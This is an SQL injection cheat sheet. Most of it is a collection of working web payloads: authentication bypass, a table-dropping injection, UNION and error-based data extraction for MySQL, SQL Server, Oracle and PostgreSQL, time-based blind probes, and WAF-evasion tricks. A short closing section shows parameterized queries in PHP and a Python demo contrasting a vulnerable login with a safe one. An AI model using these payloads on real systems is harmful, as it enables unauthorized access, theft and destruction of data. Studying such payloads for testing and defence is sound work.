*** SUPER ELITE SQL INJECTION CHEAT SHEET ***

SQL INJECTION CHEAT SHEET

BASIC SQL INJECTION

Purpose                       SQL Injection Payload
Check for vulnerability       ' OR '1'='1
Always true condition         ' OR 1=1 --
Authentication bypass         admin' --
Terminate query               '; DROP TABLE users; --
Comment syntax (MySQL)        -- comment    #comment    /*comment*/
Comment syntax (SQL Server)   -- comment    /*comment*/

UNION ATTACKS

Determine number of columns:

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3-- (continue until error)

Get data with UNION:

Database      UNION Attack Example
MySQL         ' UNION SELECT 1,2,@@version,user(),database() --
SQL Server    ' UNION SELECT 1,2,@@version,system_user,db_name() --
Oracle        ' UNION SELECT 1,2,banner,user,NULL FROM v$version --
PostgreSQL    ' UNION SELECT 1,2,version(),user,current_database() --

DATABASE FINGERPRINTING

Database      Query to Identify
MySQL         SELECT @@version
SQL Server    SELECT @@version
Oracle        SELECT banner FROM v$version
PostgreSQL    SELECT version()
SQLite        SELECT sqlite_version()

EXTRACTING DATABASE INFO

Information / MySQL / SQL Server

Current User
  MySQL:       SELECT user()
               SELECT current_user()
  SQL Server:  SELECT user_name()
               SELECT system_user

List Databases
  MySQL:       SELECT schema_name FROM information_schema.schemata
  SQL Server:  SELECT name FROM master..sysdatabases

List Tables
  MySQL:       SELECT table_name FROM information_schema.tables WHERE table_schema='database_name'
  SQL Server:  SELECT name FROM database_name..sysobjects WHERE xtype='U'

List Columns
  MySQL:       SELECT column_name FROM information_schema.columns WHERE table_name='table_name'
  SQL Server:  SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='table_name')

Boolean-based:

' AND (SELECT 'x' FROM users WHERE username='admin' AND LENGTH(password)>5)='x'--

Time-based:

Database      Time Delay Payload
MySQL         ' AND (SELECT SLEEP(5))--
              ' AND IF(1=1, SLEEP(5), 0)--
SQL Server    ' WAITFOR DELAY '0:0:5'--
PostgreSQL    ' SELECT pg_sleep(5)--
Oracle        ' AND (SELECT DBMS_PIPE.RECEIVE_MESSAGE('RND',5) FROM DUAL) IS NOT NULL--

ERROR-BASED EXTRACTION

Database      Error-based Payload
MySQL         AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
SQL Server    AND 1=CONVERT(int,(SELECT @@version))
PostgreSQL    AND 1=cast((SELECT version()) as int)
Oracle        AND 1=ctxsys.drithsx.sn(1,(SELECT banner FROM v$version WHERE rownum=1))

WAF BYPASS TECHNIQUES

Technique              Example
Case Variation         SeLeCt, UniON, sElEcT
URL Encoding           %53%45%4C%45%43%54 (SELECT)
Alternate Whitespace   /**/, %09, %0A, %0D
String Concatenation   'SEL'||'ECT', CONCAT('SE','LECT')
Commenting             SEL/*comment*/ECT
Equivalence            AND 1=1 → AND '1'='1', AND 3-2=1

PREVENTION METHODS

// Example of parameterized query
// PHP PDO
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
$stmt->execute([$username]);
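As an added example, not part of the original cheat sheet: the "check for vulnerability" and "authentication bypass" payloads from the basic table run against a string-built login query and a parameterized one, using Python's sqlite3 with a constructed in-memory users table (plaintext passwords are for the demo only).

```python
import sqlite3

# Constructed sample rows for this demo; not from any real system.
USERS = [("admin", "s3cret"), ("alice", "hunter2"), ("bob", "pass123")]


def make_db():
    """Create an in-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: user input is parsed as part of the SQL grammar."""
    sql = ("SELECT username FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Parameterized query: input is bound as data and never reaches the parser."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def demo():
    """Run both login variants against the two payloads and a legitimate login."""
    conn = make_db()
    tautology = "' OR '1'='1"   # "check for vulnerability" payload
    bypass = "admin' --"        # "authentication bypass" payload (comments out the password check)
    return {
        "tautology_vulnerable": login_vulnerable(conn, tautology, tautology),  # every row
        "tautology_safe": login_safe(conn, tautology, tautology),              # no row
        "bypass_vulnerable": login_vulnerable(conn, bypass, "wrong"),          # ['admin']
        "bypass_safe": login_safe(conn, bypass, "wrong"),                      # no row
        "legit_safe": login_safe(conn, "alice", "hunter2"),                    # ['alice']
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:22s} -> {rows}")
```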

*** USE THIS POWER RESPONSIBLY ***